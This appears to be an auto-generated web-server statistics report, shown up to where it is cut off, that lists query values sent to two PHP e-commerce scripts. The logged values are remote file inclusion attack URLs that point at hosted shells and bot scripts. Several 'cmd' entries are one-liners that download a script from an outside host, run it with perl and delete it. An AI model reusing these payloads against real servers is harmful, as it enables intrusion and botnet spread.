Value	Accesses
http://kamstorn.googlepages.com/botnet.txt?	3
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.stdr.xpg.com.br/priv8?	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.noixehfoda.xpg.com.br/sss.txt?	3
http://www.txd.conexaostore.com/tester	3
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	3
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.pucorp.t5.com.br/sub.txt?	2
http://69.93.214.234/~egacali/images/1.txt?http://69.93.214. 234/~egacali/images/1.txt?	1
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://freewebs.com/0m4rc170/botz.txt?	3
http://baixinho.we.bs/tool25.txt?	3
http://kt.digital-poison.net/spread.txt?	3
http://www.zeyteen.net/aho.txt??	3
http://drugs.kit.net/priv8.txt?	3
http://64.32.13.169/ma.txt?	3
http://www.vsm.gov.tr/ow33.txt?	3
http://usuarios.arnet.com.ar/larry123/http.txt??	3
http://www.ospenetrasitabira.com.br/files/tester.txt?	3
http://63.247.81.138/~ucrol/maya1.txt???	3
OTHER:	940
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://bsthank.t35.com/spread.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.lordxpl.xpg.com.br/own.txt??	2
http://alviverde.we.bs/mateusjp.txt?	2
http://cornuletz.angelfire.com/c99in.txt?	2
http://gikowns.googlepages.com/BOTNET-GIKO.txt?	2
OTHER:	962
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://klzor.web21.f3.k8.com.br/testador.txt	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://pc2you.ro/classes/phpmailer/config/tester.txt?	2
http://www.lordxpl.xpg.com.br/xxxx.txt??	2
http://h1.ripway.com/rootz/botnetpriv8.txt?	2
http://normanzito.iespana.es/http.txt??	2
http://www.friendsclan.eu/cmd.txt?	2
http://xsenharox.xpg.com.br/botnet1000.txt?	2
http://69.80.227.41/debugbr2/tool25.dat?	2
http://mtvktv.no-ip.org/php.txt?	2
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	2
http://usuarios.arnet.com.ar/larry123/prot.txt??	2
OTHER:	950
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://204.11.228.115/id.txt?	9
http://www.kibarnakliyat.com:8383/bitch.txt????	1
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.asilturkler.net/linxscan.txt?	2
http://priv8.crewhosting.com/php.txt??	2
http://xsenharox.xpg.com.br/e_real_nois.txt?	2
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://utilz.iespana.es/u2.gif?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://142.176.17.11/r57.txt?\r	2
http://noden.110mb.com/heh.txt?	2
http://www.digownz.kit.net/pbot1.txt?	2
http://deprive61.fileave.com/gmail.png?	2
http://humornegro.org/tool25.txt?	2
http://www.rj2009.kit.net/burro.txt?	2
OTHER:	958
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.mateus.t5.com.br/tool25.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://om-autoteile.eu/http.txt??	2
http://qlzr.iespana.es/sb4.gif?	2
http://gikowns.googlepages.com/bn.txt?	2
http://www.freewebs.com/normancito/asdasd.txt??	2
http://members.lycos.co.uk/enviescraps/cmdr0x.txt?	2
http://fotoszip.pop3.ru/r.txthttp://fotoszip.pop3.ru/r.txt	2
http://pesads.com/ss.txt?	2
http://baixinho.50webs.com/tool25.txt?	2
http://demos.na.googlepages.com/a.txt???	2
http://eduzin96.googlepages.com/l1nm.txt	2
OTHER:	950
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www .mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt; perl asdasd.txt;rm -rf asdasd.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://maconha.us/tester?	1
http://www.comandante-do-bope.com/pbot.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.atkk3.xpg.com.br/botlogin.jpg?	5
http://www.revoltz.kit.net/cmd.txt?	1
OTHER:	964
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://64.32.13.161/httc?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://joaobenner.fileave.com/script2.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://rogiels.googlepages.com/teste.gif??	1
http://suspended.by.ru/php.txt?	1
http://yahwek.dll.googlepages.com/phpbot1.txt?	1
http://www.cfr.cl/mail/bot.txt???	1
http://www.freewebs.com/scanspread/bot.txt?	1
http://cabares.t35.com/BOA.jpg?	1
http://www.freewebtown.com/xxroxx/teste.txt?	1
OTHER:	963
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	22
http://h1.ripway.com/sur00t/r0x.txt?	1
OTHER:	947
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.kibarnakliyat.com:8383/bitch.txt????	1
http://www.dpfsp.org/tester?	1
http://vcsok.com/echo?http://freewebs.com/normancito/kaka.tx t?	1
http://www.abonesin.com/linxscan.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /var/tmp;id	3
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.gratisweb.com/atk33/rave.txt?	2
http://genealogystartswithone.name/chas-s/brasil.gif?	2
http://www.xsenhalol.xpg.com.br/sasao?????????	2
http://www.freewebs.com/crew-master/apc.txt	1
OTHER:	960
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.zahnwerk.com/contenido-4.4.4/contenido/includes/p hpbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://freewebs.com/normancito/kaka.txt??	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://h1.ripway.com/sur00t/testador.txt?/par	1
http://utilz.iespana.es/n2.gif?	1
http://210.246.145.70:32000/bitch.txt???	1
http://smokan.fileave.com/bot3.txt?	1
http://pc2you.ro/classes/phpmailer/config/exp667.txt?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;wget http://decorosso.t35.com/ecolo.txt;fetch http:/ /decorosso.t35.com/ecolo.txt;curl -O http://decorosso.t35.co m/ecolo.txt;lwp-download http://decorosso.t35.com/ecolo.txt; perl ecolo.txt;rm ecolo.txt	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://nickinfos.100webspace.net/inbox.txt?	1
www.pedr0.kit.net/new.txt?	1
http://duck.prplayers.net/duckbot.txt??	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.ligseg.com.br/Etc/safe.gif?	1
http://geocities.com/skido_chua/skido.php?	1
http://yugifire.t35.com/tool25.dat?	1
http://h1.ripway.com/capetacorpz/apx.txt?	1
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://h1.ripway.com/brunas2/lp.txt?	1
http://www.maconha.us/tester	1
http://ilegals.ifrance.com/xyr???	1
http://216.222.194.67/bitch.txt???	1
http://www.hackmsn.org/11.txt?	1
http://www.freewebs.com/playssonn/dq.txt?	1
http://www.acb.bs.it/moodledata/cache/cmdlist.txt?	1
OTHER:	963
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/larry123/morgan.txt?	1
http://www.stdr.xpg.com.br/safe?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.freewebs.com/thelicor/php1.txt	1
http://64.32.13.161/ma.txt	1
http://n0gr0d.t35.com/php.txt?	1
http://piikachu.fileave.com/bot.txt?	1
http://216.222.194.67/~crew/bitch.txt??	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://pc2you.ro/classes/phpmailer/config/exp667.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www3.bloglog.com.br/pbot.txt	1
http://www.capexoutsource.com/sp1.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm secret.txt;wget http://71.41.190.203/secret.txt;f etch http://71.41.190.203/secret.txt;lwp-download http://71. 41.190.203/secret.txt;curl -O http://71.41.190.203/secret.tx t;lynx http://71.41.190.203/secret.txt;perl secret.txt;rm -r f secret.txt*http://www2.binaryshadow.org:81/~w00t/my/tool/t ool25.dat?	1
cd /tmp;rm -rf pacote;wget http://br.geocities.com/p4ulo.ha ck/pacote.txt;lwp-download http://br.geocities.com/p4ulo.hac k/pacote.txt;fetch http://br.geocities.com/p4ulo.hack/pacote .txt;curl -o pacote.txt http://br.geocities.com/p4ulo.hack/p acote.txt;GET http://br.geocities.com/p4ulo.hack/pacote.txt >pacote.txt;lynx -source http://br.geocities.com/p4ulo.hack/ pacote.txt >pacote.txt;perl pacote.txt;rm -rf pacote.txt	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://204.11.228.115/id.txt?	1
ftp://66.0.134.134/h.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/larry123/nork.txt??	4
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://enviabx.iespana.es/t.txt??	1
http://www.freewebs.com/yahwek/xisde.txt.txt?	1
http://www.interirc.net/macaco.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf scan;wget http://br.geocities.com/chatbr.own z/scan.txt;lwp-download http://br.geocities.com/chatbr.ownz/ scan.txt;fetch http://br.geocities.com/chatbr.ownz/scan.txt; curl -o scan.txt http://br.geocities.com/chatbr.ownz/scan.tx t;GET http://br.geocities.com/chatbr.ownz/scan.txt >scan.txt ;lynx -source http://br.geocities.com/chatbr.ownz/scan.txt > scan.txt;perl scan.txt;rm -rf scan.txt	2
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://h1.ripway.com/rootz/b0x.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm secret.txt;wget http://71.41.190.203/secret.txt;f etch http://71.41.190.203/secret.txt;lwp-download http://71. 41.190.203/secret.txt;curl -O http://71.41.190.203/secret.tx t;lynx http://71.41.190.203/secret.txt;perl secret.txt;rm -r f secret.txt*	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://hrrhq.dyndns.org/nuke//modules/Forums/admin/0123.jpg?	3
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://paginas.terra.com.br/lazer/systrack/pbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://bishits.com/a/safe.txt?	2
http://raptorupload.googlepages.com/inc3.txt??	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://c0debank.altervista.org/testphp.txt?	1
http://br.geocities.com/daimonium007/tool.txt?	1
http://xrodrigox.host-good.org/config.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://mtvktv.no-ip.org/php.txt?	2
http://www.freewebs.com/yahwek/xisde.txt.txt?	2
http://www.lordxpl.xpg.com.br/own.txt?	1
OTHER:	965
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
www.acgsoftware.com/1.txt??	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.nillo.com.br/IT.txt?	1
http://lifetogether.us./lt/family/bitch.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://freewebs.com/normancito/em.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://201.50.200.213:8080/httd.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://s3xy.ifrance.com/r7????	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.xsenhalol.xpg.com.br/subaj???	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://mensagenss.hospedagemdesite.com/tool25/mIltool25.dat?	1
http://www.freewebs.com/normancito/em.txt??	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://sbc.sytu.edu.cn/rodador.txt???	1
http://216.222.194.67/~crew/bitch.txt??	1
http://www.xsenharox.xpg.com.br/pbot102030ig123.txt?	1
OTHER:	967
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://raptor.we.bs/ind.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.vsm.gov.tr/pwnd/http.txt??	3
http://www.txd.conexaostore.com/tester?	3
http://usuarios.arnet.com.ar/larry123/ka.txt?	3
OTHER:	961
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.l1nuxgroup.by.ru/id.txt	1
http://mensagem.hut2.ru/env.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.defacerz.org/o.txt?	2
http://yahwek.dll.googlepages.com/phpbot1.txt?	2
OTHER:	966
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.whoirc.org/netbot.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	15
http://www.freewebs.com/sethz/php.txt?	11
http://pacotao.com/botlogin.txt?	5
http://biancaa1990.fileave.com/script9.txt??	4
http://electrobox106.com/ow33.txt?	3
http://pc2you.ro/classes/phpmailer/config/tester.txt?	2
http://cornuletz.angelfire.com/c99in.txt?	2
http://64.32.13.161/httc?	2
http://c4sh1234.100free.com/sc.gif?	2
http://regulamento.no-ip.biz/botlogin.txt?	2
OTHER:	922
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce .php	970
Parameters by Submitted Value
Parameter	path[docroot]
Value	Accesses
http://www.vwbr.com.br/virus.txt?	1
http://eoi-castello.uji.es/user_upload/File/ultimate.txt?	1
OTHER:	968
Script	Total Accesses
/wusage/summary/cgi.html/distribution/administrator/componen ts/com_phpshop/toolbar.phpshop.html.php	970
Parameters by Submitted Value
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.oifotosbrasil.com/tester.txt?	1
OTHER:	969
Script	Total Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecomm